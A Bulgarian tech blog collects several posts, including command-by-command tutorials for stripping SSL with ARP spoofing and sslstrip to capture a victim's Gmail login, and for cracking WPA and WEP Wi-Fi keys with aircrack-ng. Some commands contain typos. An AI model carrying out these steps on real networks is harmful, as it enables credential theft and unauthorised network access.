Днес вечерта мисля да направя видео демонстрация как се премахва паролата на потребител в Windows NT/2k/XP/Vista. Идеята е, че ако си забравите паролата и неможете да си влезете в профила не е необходимо да преинсталирате целия Windows, а просто да я премахнете :) .
Да спасим MySQL
Както всеки ползващ MySQL се почувствах длъжен макар и с малко закъснение да напиша кратка публикация понеже се изписа доста вече по този въпрос.
На кратко: Oracle ще закупуват SUN, а както знаете MySQL е част от SUN, респективно MySQL като конкурент на Oracle може доста сериозно да пострада.
Изпратихте ли писмо-молба до Европейската комисия!? Ето ви повече информация къде и какво да изпратите-> ТУК
Официален сайт на създателя на MySQL: Michael "Monty" Widenius
Връзка към кампанията "Да спасим MySQL": Michael "Monty" Widenius
Ето няколко линка с повече информация на български: dkolov.log. bg, bogomil.info, technews.bg
Да се надяваме, че Европейската комисия ще помогне.
SSL Hijacking- Видео демонстрация
Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.
Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.
Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа
Избираме потребител с IP адрес 192.168.1.100
Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и редактираме /etc/etter.conf
Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward
Сега пренасочваме порт 80 към 10 000 с iptables
iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Сега изпълняваме arp спуфинг
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
В терминал две стартираме sslstrip с аргумент -a -k -f
sslstrip -a -k -f
И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)
ettercap -T -q -i eth0
Хайде сега да наблюдаваме машината на потребителя
Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com
Въвежда примерно потребителско име и парола
Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.
По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.
Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.
Видео демонстрация SSL Hijacking:
1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube
Плъгин Auto edno23 за WordPress
Днес направих плъгин за WordPress които автоматично добавя вашата публикация във www.edno23.com . Идеята е с едно публикуване в WordPress да публикувате и в edno23 .
Плъгинът "Auto edno23" има страница за настройка където трябва да въведете вашето edno23 потребителско име и парола. От там можете да изберете с тик дали автоматично да се публикува публикацията в edno23 или само когато отметнете тикчето при самото добавяне от WordPress. Добавил съм и възможност да прави кратки връзки от рода "http://is.gd/5LREc"
Плъгинът може да бъде изтеглен от тук: Плъгин Auto edno23
От тук може да изтеглите директно сорса на плъгина-> Сорс на плъгин
PS: Използвал съм за основа auto tweeter които доста моднах :)
Разбиване на Wireless с WPA encoding
Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0
Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.
# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0
След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.
За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty
Първо ще реализираме кракване с aircrack
cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
Сега ще направим кракване с cowpatty:
cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net
И двата метода успяват да кракнат паролата и да я изведат.
Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com: Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
До скоро от mpetrov.net
PS: Това е истината-> EPRB
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Разбиване на Wireless с WEP encoding
Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.
Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring;
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)
Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.
# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0
Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.
След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C
Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.
aircrack-ng wep-03.cap
Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Linux модул за TP-LINK TL-WN321G
Полезни неща за писачите на WordPress плъгини
Преди малко трябваше да напиша на бързо един прост плъгин за WordPress които да изпраща съдържанието на публикацията и линка към нея в един приятелски сайт. След като го направих реших да напиша по- важните неща от него:
1. Извеждане на съдържание на публикацията:
$_POST['post_content']
2. Извеждане на заглавието на публикацията:
$_POST['post_title']
3. Извеждане на линк на публикацията:
global $post_ID;
get_permalink($post_ID);
4. Добавяне на действие при публикуване:
add_action('publish_post', 'submit_friend_site');
Как да проверя какъв е моят IP Address
Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address
Как да проверя какъв е моят IP Address
Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address